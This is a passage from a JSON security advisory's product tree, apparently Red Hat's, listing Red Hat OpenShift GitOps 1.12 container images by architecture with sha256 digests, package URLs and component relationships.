"purl": "pkg:oci/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"product": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"product_id": "openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-operator-bundle\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.12.5-5"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"product": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"product_id": "openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel9\u0026tag=v1.12.5-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.12.5-5"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.12.5-5"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le"
},
"product_reference": "openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64"
},
"product_reference": "openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64"
},
"product_reference": "openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64"
},
"product_reference": "openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64"
},
"product_reference": "openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x"
},
"product_reference": "openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64 as a component of Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64"
},
"product_reference": "openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"relates_to_product_reference": "8Base-GitOps-1.12"
},
{
"category": "default_component_of",
"full_product_name": {
